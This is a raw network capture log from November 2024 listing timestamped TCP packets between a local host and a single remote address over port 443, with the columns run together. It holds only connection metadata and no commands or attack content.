                                                                                                                                                                                              Nov 24, 2024 13:40:06.137742996 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:06.137753010 CET49901443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:06.137762070 CET4434990113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:06.140899897 CET49906443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:06.140949011 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:06.141040087 CET49906443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:06.141206980 CET49906443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:06.141223907 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:06.166055918 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:06.169334888 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:06.169517040 CET49902443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:06.169558048 CET49902443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:06.169570923 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:06.169584990 CET49902443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:06.169589996 CET4434990213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:06.172877073 CET49907443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:06.172907114 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:06.172979116 CET49907443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:06.173137903 CET49907443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:06.173149109 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:07.642792940 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:07.643528938 CET49903443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:07.643548965 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:07.644066095 CET49903443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:07.644072056 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:07.651357889 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:07.651518106 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:07.651968002 CET49904443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:07.651983976 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:07.652570009 CET49904443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:07.652574062 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:07.652653933 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:07.652669907 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:07.653160095 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:07.653163910 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.030313015 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.031004906 CET49907443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.031059980 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.031482935 CET49907443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.031518936 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.084244967 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.086716890 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.087393999 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.087472916 CET49904443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.087517977 CET49904443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.087541103 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.087563038 CET49904443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.087569952 CET4434990413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.090332031 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.090405941 CET49903443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.090441942 CET49903443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.090460062 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.090481043 CET49903443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.090487957 CET4434990313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.090965033 CET49908443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.090997934 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.091058016 CET49908443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.091245890 CET49908443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.091260910 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.092457056 CET49909443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.092506886 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.092577934 CET49909443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.092696905 CET49909443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.092710018 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.102658033 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.105845928 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.105925083 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.105942011 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.106010914 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.106061935 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.106097937 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.106125116 CET49905443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.106138945 CET4434990513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.108448029 CET49910443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.108468056 CET4434991013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.108537912 CET49910443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.108773947 CET49910443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.108787060 CET4434991013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.168392897 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.168987989 CET49906443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.169003963 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.169481993 CET49906443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.169486046 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.464622021 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.468108892 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.468198061 CET49907443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.468275070 CET49907443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.468293905 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.468312025 CET49907443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.468317986 CET4434990713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.471564054 CET49911443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.471606016 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.471683025 CET49911443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.471846104 CET49911443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.471857071 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.615576982 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.618519068 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.618591070 CET49906443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.618649960 CET49906443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.618674040 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.618684053 CET49906443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.618690014 CET4434990613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.621963024 CET49912443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.622010946 CET4434991213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:08.622078896 CET49912443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.622271061 CET49912443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:08.622287989 CET4434991213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:09.843357086 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:09.843848944 CET49909443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:09.843873024 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:09.844436884 CET49909443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:09.844443083 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:09.859102964 CET4434991013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:09.859561920 CET49910443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:09.859601974 CET4434991013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:09.860013008 CET49910443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:09.860021114 CET4434991013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:09.897676945 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:09.898099899 CET49908443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:09.898118973 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:09.898545980 CET49908443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:09.898550987 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.212992907 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.213675976 CET49911443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.213701963 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.214200974 CET49911443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.214206934 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.277704954 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.280864954 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.280917883 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.280940056 CET49909443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.280996084 CET49909443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.281042099 CET49909443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.281042099 CET49909443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.281083107 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.281114101 CET4434990913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.284241915 CET49913443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.284279108 CET4434991313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.284367085 CET49913443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.284516096 CET49913443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.284535885 CET4434991313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.292882919 CET4434991013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.295867920 CET4434991013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.295937061 CET49910443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.295999050 CET49910443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.296016932 CET4434991013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.296027899 CET49910443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.296032906 CET4434991013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.298736095 CET49914443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.298777103 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.298834085 CET49914443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.298963070 CET49914443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.298979998 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.340744972 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.343839884 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.343903065 CET49908443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.355659008 CET49908443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.355675936 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.355694056 CET49908443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.355699062 CET4434990813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.360949993 CET49915443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.360981941 CET4434991513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.361285925 CET49915443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.361557961 CET49915443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.361569881 CET4434991513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.415642977 CET4434991213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.416197062 CET49912443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.416215897 CET4434991213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.416672945 CET49912443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.416678905 CET4434991213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.649455070 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.649491072 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.649537086 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.649590015 CET49911443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.649637938 CET49911443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.650002003 CET49911443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.650019884 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.650034904 CET49911443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.650039911 CET4434991113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.653654099 CET49916443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.653709888 CET4434991613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.653796911 CET49916443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.654011965 CET49916443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.654025078 CET4434991613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.859128952 CET4434991213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.862149954 CET4434991213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.862268925 CET49912443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.862314939 CET49912443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.862339973 CET4434991213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.862354040 CET49912443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.862361908 CET4434991213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.865794897 CET49917443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.865837097 CET4434991713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:10.865950108 CET49917443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.866209984 CET49917443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:10.866224051 CET4434991713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:11.866581917 CET4434991313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:11.867114067 CET49913443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:11.867127895 CET4434991313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:11.867712021 CET49913443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:11.867717981 CET4434991313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.088814974 CET4434991513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.089229107 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.089407921 CET49915443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.089427948 CET4434991513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.089534044 CET49914443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.089561939 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.089960098 CET49915443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.089965105 CET4434991513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.089987040 CET49914443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.089997053 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.310373068 CET4434991313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.313373089 CET4434991313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.313422918 CET4434991313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.313463926 CET49913443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.313483953 CET49913443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.313550949 CET49913443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.313550949 CET49913443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.313575029 CET4434991313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.313585043 CET4434991313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.316708088 CET49918443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.316747904 CET4434991813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.316818953 CET49918443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.316982985 CET49918443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.316998959 CET4434991813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.435297012 CET4434991613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.435909033 CET49916443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.435935020 CET4434991613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.436383009 CET49916443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.436388969 CET4434991613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.524328947 CET4434991513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.527362108 CET4434991513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.527436972 CET49915443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.527455091 CET4434991513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.527549982 CET4434991513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.527559042 CET49915443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.527570963 CET49915443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.527600050 CET49915443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.527601004 CET4434991513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.527616978 CET4434991513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.530599117 CET49919443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.530653000 CET4434991913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.530744076 CET49919443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.530906916 CET49919443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.530917883 CET4434991913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.533477068 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.536700010 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.536761999 CET49914443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.536789894 CET49914443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.536813021 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.536827087 CET49914443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.536834955 CET4434991413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.539222002 CET49920443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.539263010 CET4434992013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.539336920 CET49920443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.539449930 CET49920443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.539462090 CET4434992013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.654820919 CET4434991713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.655538082 CET49917443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.655564070 CET4434991713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.656025887 CET49917443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.656032085 CET4434991713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.880181074 CET4434991613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.880289078 CET4434991613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.880451918 CET49916443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.880583048 CET49916443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.880599976 CET4434991613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.880610943 CET49916443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.880616903 CET4434991613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.883966923 CET49921443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.884074926 CET4434992113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:12.884172916 CET49921443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.884371042 CET49921443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:12.884423971 CET4434992113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:13.100176096 CET4434991713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:13.102793932 CET4434991713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:13.102855921 CET4434991713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:13.102858067 CET49917443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:13.102919102 CET49917443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:13.102966070 CET49917443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:13.103003979 CET4434991713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:13.103024006 CET49917443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:13.103034019 CET4434991713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:13.106110096 CET49922443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:13.106151104 CET4434992213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:13.106239080 CET49922443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:13.106412888 CET49922443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:13.106426001 CET4434992213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.162323952 CET4434991813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:14.185519934 CET49918443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:14.185543060 CET4434991813.107.246.63192.168.2.6
